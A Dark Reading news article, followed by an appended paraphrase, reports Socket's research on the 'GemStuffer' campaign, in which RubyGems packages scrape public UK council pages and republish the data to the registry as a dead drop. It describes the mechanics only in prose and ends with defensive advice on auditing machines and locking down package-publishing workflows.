Attackers Weaponize RubyGems for Data Dead Drops TechTarget and Informa Tech’s Digital Business Combine.TechTarget and InformaTechTarget and Informa Tech’s Digital Business Combine.Together, we power an unparalleled network of 220+ online properties covering 10,000+ granular topics, serving an audience of 50+ million professionals with original, objective content from trusted sources. We help you gain critical insights and make more informed decisions across your business priorities.Dark Reading Resource LibraryBlack Hat NewsOmdia CybersecurityAdvertiseNewsletter Sign-UpNewsletter Sign-UpCybersecurity TopicsRelated TopicsApplication SecurityCybersecurity CareersCloud SecurityCyber RiskCyberattacks & Data BreachesCybersecurity AnalyticsCybersecurity OperationsData PrivacyEndpoint SecurityICS/OT SecurityIdentity & Access Mgmt SecurityInsider ThreatsIoTMobile SecurityPerimeterPhysical SecurityRemote WorkforceThreat IntelligenceVulnerabilities & ThreatsRecent in Cybersecurity TopicsСloud SecurityLatAm Vibe Hackers Generate Custom Hacking Tools on the FlyLatAm Vibe Hackers Generate Custom Hacking Tools on the FlybyAlexander CulafiMay 13, 20265 Min ReadApplication SecurityIt's Patch Tuesday for Microsoft & Not a Zero-Day In SightIt's Patch Tuesday for Microsoft & Not a Zero-Day In SightbyJai VijayanMay 12, 20265 Min ReadWorld Related TopicsDR GlobalMiddle East & AfricaAsia PacificLatin AmericaSee AllThe EdgeDR TechnologyEventsRelated TopicsUpcoming EventsPodcastsWebinarsSEE ALLResourcesRelated TopicsResource LibraryNewslettersPodcastsReportsVideosWebinarsWhite Papers Partner PerspectivesDark Reading Resource LibraryApplication SecurityVulnerabilities & ThreatsThreat IntelligenceData PrivacyNewsAttackers Weaponize RubyGems for Data Dead DropsThreat actors are publishing RubyGems packages that include scrapers targeting public-facing UK government servers, but with no clear objective.Alexander Culafi,Senior News Writer,Dark ReadingMay 13, 20264 Min ReadSource: Zerilli Media via Alamy Stock PhotoA new threat campaign is using RubyGems as a dead drop to store exfiltrated data, but the attacker's long-term plans are less clear. Software development security vendor Socket published research concerning a campaign dubbed "GemStuffer," where an attacker abused the RubyGems package registry "as a data transport mechanism rather than a conventional malware distribution channel," according to a blog post. RubyGems is a package manager for the Ruby programming language, and acts as a way for developers to distribute Ruby programs or libraries, which are referred to as "gems."On the surface, this would look like any number of attacks impacting the open source development supply chain in recent months. There are the Shai-Hulud self-propagating worms, novel ways to compromise open source AI models, and countless attacks against the NPM package ecosystem.But in this case, the primary victim is unclear, as is the full scope of the threat activity. What organizations need to pay attention to is what the attacker might be planning next and how they can prepare.Related:It's Patch Tuesday for Microsoft & Not a Zero-Day In SightGemStuffer Hints at Bigger AttacksIn this case, GemStuffer concerns more than 100 gems that appear to use RubyGems as a dead drop for data rather than to distribute conventional malware. The attackers are publishing a large number of packages with few or even no downloads that contain payloads that are "repetitive, noisy, and unusually self-contained," according to Socket.The scripts within the packages merely fetch pages from UK local government portals used by the Lambeth, Wandsworth, and Southwark districts in London; scraped data includes council calendar pages, agenda listings, committee link, and other such public-facing information. This data is then published back to RubyGems as .gem archives through hardcoded API keys. "In some samples, the payload creates a temporary RubyGems credential environment under /tmp, overrides HOME, builds a gem locally, and pushes it to rubygems.org," the blog post read. "Other variants skip the gem CLI entirely and POST the archive directly to the RubyGems API."The attacker later downloads the package from RubyGems and extracts the data. No command-and-control (C2) server needed.There are several unusual aspects to this campaign beyond the dead drop piece. For one, this activity was observed at the same time that RubyGems was under attack via an apparent coordinated spam-publishing campaign. Socket did not directly attach this campaign to that threat activity, though the vendor did mention it as having a similar abuse pattern to the spam campaign. Related:Worm Redux: Fresh Mini Shai-Hulud Infections Bite Supply ChainSecond, the threat actor created an automated scraper with worm potential, yet they're using it to scrape public facing data and not putting significant data into these packages to get potential victims to click on them. These gems do not contain conventional malware, but instead data collection tools and scripts for uploading packages using built-in API keys.It could be a test run against government servers or practice using novel malware, but the motivation is unclear. "It may be registry spam, a proof-of-concept worm, an automated scraper misusing RubyGems as a storage layer, or a deliberate test of package registry abuse," Socket said in its post. "But the mechanics are intentional: repeated gem generation, version increments, hardcoded RubyGems credentials, direct registry pushes, and scraped data embedded inside package archives."Feross Aboukhadijeh, founder and CEO of Socket, tells Dark Reading that the threat actor's technique was clever, but execution was "noisy.""That usually points to testing, automation, or spam rather than a mature operation trying to preserve stealth," he says. "The actor may have cared less about staying hidden and more about proving that RubyGems could be used as a transport layer."Related:'TrustFall' Convention Exposes Claude Code Execution RiskWhat Developers Need to Know About GemStufferFor developers, Socket urged caution because, while none of these 155-plus compromised packages have been downloaded to a significant degree, GemStuffer shows a novel use case for exploiting package repositories (as dead drops). The campaign also serves as an example for why software package registries should not be implicitly trusted. Organizations that download Ruby packages or believe they may be affected by GemStuffer should audit the /tmp folder on all potentially affected machines; identify the delivery vector if a package is present on a machine (as these gems are not self-propogating); and block outbound gem pushes in CI pipelines that do not publish gems, Socket said. Aboukhadijeh says the business risk is "less about these specific junk gems being installed and more about what the behavior may be testing.""This lands at a time when everyone in supply chain security is already on alert after seeing worm-like campaigns move across multiple ecosystems, including npm, PyPI, and Packagist. Security teams often focus on what packages developers install, but publishing activity needs attention too," he explains. "Defenders should know which developer machines, CI jobs, and service accounts are allowed to publish to public registries, and they should lock down those publishing workflows so only approved systems can publish approved packages."About the AuthorAlexander CulafiSenior News Writer, Dark ReadingAlex is an award-winning writer, journalist, and podcast host based in Boston. After cutting his teeth writing for independent gaming publications as a teenager, he graduated from Emerson College in 2016 with a Bachelor of Science in journalism. He has previously been published on VentureFizz, Search Security, Nintendo World Report, and elsewhere. On Dark Reading, he covers a variety of topics including the cybercrime ecosystem, open source security, and the intersection between AI and threat actors. In his spare time, Alex hosts the weekly Nintendo podcast Talk Nintendo Podcast and works on personal writing projects, including two previously self-published science fiction novels.He has received numerous awards, including TechTarget's Writer of the Year in 2022 as well as more than 10 Azbee awards for his reporting between 2022 and today. See more from Alexander CulafiWant more Dark Reading stories in your Google search results?Add Us NowMore InsightsIndustry ReportsHow Enterprises Are Developing Secure ApplicationsInside RSAC 2026: security leaders reveal the risks redefining your defense strategyHow Enterprises Are Harnessing Emerging Technologies in CybersecurityDitch the Data Center: Understanding Flexible Cloud Infrastructure Security Management2025 State of MalwareAccess More ResearchWebinarsYour Guide to Securing AI Adoption in Your OrganizationWhat is the Right Role for Identity Threat Detection and Response (ITDR) in Your Organization?The New Attack Surface: How Attackers Are Exploiting OAuth to Own Your Cloud WorkspacePrompt Injection Is Just the Start: Securing LLMs in AI SystemsAnatomy of a Data Breach: What to Do if it Happens to YouMore WebinarsEditor's ChoiceThreat IntelligenceFrom Stuxnet to ChatGPT: 20 News Events That Shaped CyberFrom Stuxnet to ChatGPT: 20 News Events That Shaped CyberbyDark Reading Editorial TeamMay 6, 202631 Min ReadCyber RiskPhysical Cargo Theft Gets a Boost From CybercriminalsPhysical Cargo Theft Gets a Boost From CybercriminalsbyRobert LemosMay 4, 20265 Min ReadWant more Dark Reading stories in your Google search results?Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.SubscribeRSAC 2026: key news & insightsAt RSAC 2026, Dark Reading captured critical intelligence on AI, new attack methods, geopolitics, and much moreGet Your RecapWebinarsYour Guide to Securing AI Adoption in Your OrganizationTues, June 9, 2026 at 1pm ESTWhat is the Right Role for Identity Threat Detection and Response (ITDR) in Your Organization?Wed, June 3, 2026 at 1pm ESTThe New Attack Surface: How Attackers Are Exploiting OAuth to Own Your Cloud WorkspaceWed, June 24,2026 at 1pm ESTPrompt Injection Is Just the Start: Securing LLMs in AI SystemsTues, May 26, 2026, at 1pm ESTAnatomy of a Data Breach: What to Do if it Happens to YouJune 18th, 2026 | 11:00am -5:00pm ET | Doors Open at 10:30am ETMore WebinarsBlack Hat USA | Mandalay Bay, Las VegasThe premier cybersecurity event of the year returns to Mandalay Bay with a re‑engineered, six‑day program built to ignite innovation, push boundaries, and bring the global security community together like never before. Use code: DARKREADING to save $200 on a Briefings pass or $100 on a Business pass.GET YOUR PASSDiscover MoreBlack HatOmdiaWorking With UsAbout UsAdvertiseReprintsJoin UsNewsletter Sign-UpFollow UsCopyright © 2026 TechTarget, Inc. d/b/a Informa TechTarget. This website is owned and operated by Informa TechTarget, part of a global network that informs, influences and connects the world’s technology buyers and sellers. All copyright resides with them. Informa PLC’s registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. TechTarget, Inc.’s registered office is 275 Grove St. Newton, MA 02466.Home|Cookie Policy|Privacy|Terms of UseYour Privacy Choices

Threat actors have been weaponizing the RubyGems package registry to facilitate data exfiltration, utilizing it as a discreet dead drop mechanism rather than a typical malware distribution channel. This campaign, identified by the vendor as "GemStuffer," involves publishing numerous RubyGems packages that contain scraping scripts targeting public-facing UK government portals, including those for the Lambeth, Wandsworth, and Southwark districts. These packages contain tools designed to collect public information such as council calendar pages, agenda listings, and committee links. The methodology involves embedding this scraped data within the .gem archives.

The process employed by the attackers is intentionally designed to leverage the RubyGems ecosystem for transport. In some samples, the payloads establish a temporary RubyGems credential environment within the /tmp directory, build a gem locally, and subsequently push this package to rubygems.org. Alternative variants bypass the standard gem command-line interface entirely, opting to directly POST the archives to the RubyGems API. After the data is stored in the repository, the attacker downloads the package from RubyGems to extract the exfiltrated information, thus eliminating the necessity for a traditional command and control server.

The observed activity displays several unusual characteristics. Unlike conventional attacks, these gems do not contain malicious payloads; instead, they function as data collection tools and scripts designed for uploading packages, utilizing built-in API keys. This suggests the motivation may revolve around testing, automation, registry spam, a proof-of-concept worm, or the deliberate abuse of the package registry as a storage layer. Feross Aboukhadijeh noted that while the technique was clever, the execution was noisy, which typically indicates testing, automation, or spam rather than a mature operation focused on stealth.

For developers and organizations, this campaign highlights a significant vulnerability concerning the implicit trust placed in software package repositories. Socket urged caution, emphasizing that organizations downloading Ruby packages should audit the /tmp folder on potentially affected machines and identify any delivery vector if a package is present. Furthermore, security teams must expand their focus beyond installed packages to monitor publishing activity. Defenders are advised to scrutinize which developer machines, continuous integration jobs, and service accounts are authorized to publish to public registries, and to implement controls that lock down these publishing workflows to ensure only approved systems can publish authorized packages. This approach is crucial for addressing the broader supply chain security concerns arising from worm-like campaigns across various ecosystems.